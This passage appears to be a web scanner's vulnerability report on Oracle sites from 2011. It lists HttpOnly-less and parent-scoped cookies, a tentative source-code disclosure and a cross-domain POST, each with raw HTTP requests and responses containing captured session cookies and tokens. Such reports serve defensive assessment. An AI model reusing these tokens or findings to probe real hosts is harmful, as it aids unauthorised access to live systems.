GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntPSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ..............................................ST................XY............................TV............................PQ....................................................[SNIP]...
6.30. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-m-bg.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntSSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ ....................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;
6.31. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-r.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/
Request
GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001ntRSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/ .........................MO.......MN.......PQ.......ST............................................................................................................................[SNIP]...
6.32. https://login.oracle.com/mysso/sso_loginui/sso_check.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/sso_check.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Request
GET /mysso/sso_loginui/sso_check.js HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nscSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/ .indexOf("Netscape") !=-1);...[SNIP]...
6.33. https://login.oracle.com/mysso/sso_loginui/t-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-bg.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/t-bg.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvPSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..................................................................................................................................................................................[SNIP]...
6.34. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-l-corner.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvRSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..................................................................................................................................................................................[SNIP]...
6.35. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-r-corner.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/
Request
GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nvSSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/ ..................................................................................................................................................................................[SNIP]...
6.36. https://login.oracle.com/oam/server/sso/auth_cred_submit
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/
Request
POST /oam/server/sso/auth_cred_submit HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000=1464845504205588723&OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S...[SNIP]...
Response
HTTP/1.1 200 OKUS1EaweP001pGiSet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/ .submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
6.37. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/pls/orasso/orasso.wwsso_app_admin.ls_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/index.html;q=0.3
Response
HTTP/1.1 200 OKUS1EaweP001nsISet-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/ .submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
6.38. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://oraclestore.oracle.com
Path:
/OA_HTML/ibeCZzpHome.jsp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/ GSI_pses=ZG36BBD0929B07C4DF99506769D66E5D4B8DBCA062B2F1A6DD61DE9A7BFE077AE9C90FADE45E3BCEAF4B4C29A29F35F171; expires=Fri, 16-Dec-2011 02:34:04 GMT; path=/OA_HTML BIGipServergsiap_store_http=3540882061.5150.0000; path=/
Request
GET /OA_HTML/ibeCZzpHome.jsp HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jspSet-Cookie: GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/ Set-Cookie: GSI_pses=ZG36BBD0929B07C4DF99506769D66E5D4B8DBCA062B2F1A6DD61DE9A7BFE077AE9C90FADE45E3BCEAF4B4C29A29F35F171; expires=Fri, 16-Dec-2011 02:34:04 GMT; path=/OA_HTML Set-Cookie: BIGipServergsiap_store_http=3540882061.5150.0000; path=/ >Redirect to ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp</TITLE></HEAD><BODY><A HREF="ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTM...[SNIP]...
6.39. http://solutions.oracle.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:portal=9.0.3+en-us+us+AMERICA+AF7668106FBD0F72E040578C52E12D0A+E3D54B72DD68F2D122F42F952D033AFFE493CFF1636857E6691F09CA1EC90AE536E00D2793662A0B450C3E4B7F6AF0B885D5D5EFD8B8A7B25D16B417C0A0D17AAB52691B72E75103EABDC74A756F5232591455FA5717433E; path=/ BIGipServersolcat_pool=1309512333.25118.0000; path=/
Request
GET / HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily.com/home/basic_searchSet-Cookie: portal=9.0.3+en-us+us+AMERICA+AF7668106FBD0F72E040578C52E12D0A+E3D54B72DD68F2D122F42F952D033AFFE493CFF1636857E6691F09CA1EC90AE536E00D2793662A0B450C3E4B7F6AF0B885D5D5EFD8B8A7B25D16B417C0A0D17AAB52691B72E75103EABDC74A756F5232591455FA5717433E; path=/ -10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=571750;ecid=72057677493118445,0)ervlet/portal/!PORTAL.wwpob_smd.redirectSet-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/
6.40. http://solutions.oracle.com/portal/page/portal/OPN/sol_cat_wrapper
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/OPN/sol_cat_wrapper
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:portal=9.0.3+en-us+us+AMERICA+AF767394F9188550E040578C51E11709+2DF571B67DB6DC5DB2E97297460AC28F97AEF667860E848D501A9A168B24713EB669879EB4C7282EF78E8688AB688FC3048CF6C26B56E64A2995D0827C6B9272052FBDFA829B7D90451B0B04B838125E33809B917673EBF4; path=/ BIGipServersolcat_pool=1309512333.25118.0000; path=/ BIGipServersolcat_pool=1309512333.25118.0000; path=/
Request
GET /portal/page/portal/OPN/sol_cat_wrapper HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily.com/portal/pls/portal/!PORTAL.wwpob_smd.login?_smd_login_url=http%3A%2F%2Fsolutions.oracle.com%2Fportal%2Fpage%2Fportal%2FOPN%2Fsol_cat_wrapperSet-Cookie: portal=9.0.3+en-us+us+AMERICA+AF767394F9188550E040578C51E11709+2DF571B67DB6DC5DB2E97297460AC28F97AEF667860E848D501A9A168B24713EB669879EB4C7282EF78E8688AB688FC3048CF6C26B56E64A2995D0827C6B9272052FBDFA829B7D90451B0B04B838125E33809B917673EBF4; path=/ Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/ -10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=571660;ecid=72057686083055858,0)_wrapperSet-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/
6.41. http://solutions.oracle.com/portal/page/portal/OPN/sol_cat_wrapper/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/OPN/sol_cat_wrapper/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:portal=9.0.3+en-us+us+AMERICA+AF7668106FBE0F72E040578C52E12D0A+E8D3E47FF748F7451020EFF2147788D3032C3CE96B46C7FDD5F4DF8AF2834472B4B66E1D8F4E69611584A5314CFC92179A6A76C4B2478CF6121F226A931AED614250D91DD86C9D2F4DB1ECE535734E8BB454B469DF47FBC2; path=/ BIGipServersolcat_pool=1309512333.25118.0000; path=/ BIGipServersolcat_pool=1309512333.25118.0000; path=/
Request
GET /portal/page/portal/OPN/sol_cat_wrapper/ HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily.com/portal/pls/portal/!PORTAL.wwpob_smd.login?_smd_login_url=http%3A%2F%2Fsolutions.oracle.com%2Fportal%2Fpage%2Fportal%2FOPN%2Fsol_cat_wrapperSet-Cookie: portal=9.0.3+en-us+us+AMERICA+AF7668106FBE0F72E040578C52E12D0A+E8D3E47FF748F7451020EFF2147788D3032C3CE96B46C7FDD5F4DF8AF2834472B4B66E1D8F4E69611584A5314CFC92179A6A76C4B2478CF6121F226A931AED614250D91DD86C9D2F4DB1ECE535734E8BB454B469DF47FBC2; path=/ Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/ -10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=466767;ecid=72057690378020785,0)_wrapper/Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/
6.42. http://solutions.oracle.com/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:portal=9.0.3+en-us+us+AMERICA+AF7668106FCC0F72E040578C52E12D0A+7943B303FA163202D6673E5F24FBB61634327EA4FEB2B4A1F07824F917876092D1847591CCF15B3BE6F7A2540EB84A7C2D6F5624EEEB23095C69E6C3D61A4BC19D4B600E16C9225DB13EA0533C1B1A11D3BAA48DF4E137C4; path=/ BIGipServersolcat_pool=1292735117.25118.0000; path=/
Request
GET /portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/ HTTP/1.1
Response
HTTP/1.1 200 OKSet-Cookie: portal=9.0.3+en-us+us+AMERICA+AF7668106FCC0F72E040578C52E12D0A+7943B303FA163202D6673E5F24FBB61634327EA4FEB2B4A1F07824F917876092D1847591CCF15B3BE6F7A2540EB84A7C2D6F5624EEEB23095C69E6C3D61A4BC19D4B600E16C9225DB13EA0533C1B1A11D3BAA48DF4E137C4; path=/ -10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=449255;ecid=134994811307,0)_searches/partners/specializations/applications/oracle_policy_automation/Set-Cookie: BIGipServersolcat_pool=1292735117.25118.0000; path=/ /xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]...
6.43. http://solutions.oracle.com/specializedpartners/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/specializedpartners/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:portal=9.0.3+en-us+us+AMERICA+AF76739406FE58A3E040578C51E11AE1+C6405FE855A5760E772F3DFEFED889B7D6B7CD665F8BD8F797CEE2750AC703C0C2AA39586DB16688E0F8186FB8876A00F9DDB232E9A4CF16D3511E6FA4D71A4A46F633E2A917F9E06B97CFD6CE52A64C4AAD864882FA3C65; path=/ BIGipServersolcat_pool=1309512333.25118.0000; path=/
Request
GET /specializedpartners/ HTTP/1.1
Response
HTTP/1.1 200 OKSet-Cookie: portal=9.0.3+en-us+us+AMERICA+AF76739406FE58A3E040578C51E11AE1+C6405FE855A5760E772F3DFEFED889B7D6B7CD665F8BD8F797CEE2750AC703C0C2AA39586DB16688E0F8186FB8876A00F9DDB232E9A4CF16D3511E6FA4D71A4A46F633E2A917F9E06B97CFD6CE52A64C4AAD864882FA3C65; path=/ -10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=466851;ecid=72057711852870427,0)lizedpartners/Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/ /xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]...
7. Source code disclosure
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
https://campus.oracle.com
Path:
/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
Issue detail
The application appears to disclose some server-side source code written in PHP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
Request
GET /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/gwt/otn.todo.TodoApp/TodoApp.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/head><body><script><!--.core.client.',qbc='com.google.gwt.http.client.'...[SNIP]... =Bbc+'NamedNodeMapImpl';_.tI=61;function rM(b,a){DL(b,a);return b;}<?');vpb(a,bM(this));vpb(a,' ');vpb(a,tM(this));vpb(a,'?> ');return zpb(a);}'ProcessingInstructionImpl';_.tI=62;function fN(){fN=qxb;xN=BM(new AM());}...[SNIP]...
8. Cross-domain POST
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/apac-subscribe.html
Issue detail
The page contains a form which POSTs data to the domain feedburner.google.com . The form contains the following fields:
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /campus/HR/apac-subscribe.html HTTP/1.1/campus/HR/apac-subscribe.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="text-align:center;" action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=CampusoraclecomNews', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true"> <input type="text" style="width:100px; font-size:10px; color:#999999;" name="email" id="email" value="Enter Email Address" onfocus="setblank()" onblur="setvalue()"/>...[SNIP]...
9. Cookie scoped to parent domain
previous
next
There are 3 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
9.1. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/IrcVisitor.jsp
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/
Request
GET /OA_HTML/IrcVisitor.jsp HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=aI-seAnN7gYCF5vKSizOZg..98453aac9dc9b74d3c9b8937d8701988a5259b0428b92ef860b014a.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secureSet-Cookie: GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/ _irecruitment_http=1527616141.5150.0000; path=/>Redirect to https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW...[SNIP]...
9.2. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://oraclestore.oracle.com
Path:
/OA_HTML/ibeCAcpSSOLogin.jsp
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/
Request
GET /OA_HTML/ibeCAcpSSOLogin.jsp HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp&langCode=USdc8301890cff82302c6164caa5fbe274fbcd6b64f26c589fd7e206f.e34Qb38Qax0Obi0La3mQaxaObNuNe0; path=/OA_HTML; secureSet-Cookie: GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/ D744455D1A0925C59A3AD3C1FF690A1596002B149367678487AD7773EFC9EF14E0C8F8F29DEECE96E7F0713; expires=Fri, 16-Dec-2011 02:34:05 GMT; path=/OA_HTML_http=1510838925.5150.0000; path=/>Redirect to https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore...[SNIP]...
9.3. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://oraclestore.oracle.com
Path:
/OA_HTML/ibeCZzpHome.jsp
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/
Request
GET /OA_HTML/ibeCZzpHome.jsp HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jspSet-Cookie: GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/ B07C4DF99506769D66E5D4B8DBCA062B2F1A6DD61DE9A7BFE077AE9C90FADE45E3BCEAF4B4C29A29F35F171; expires=Fri, 16-Dec-2011 02:34:04 GMT; path=/OA_HTML_http=3540882061.5150.0000; path=/>Redirect to ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp</TITLE></HEAD><BODY><A HREF="ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTM...[SNIP]...
10. Cross-domain Referer leakage
previous
next
There are 2 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
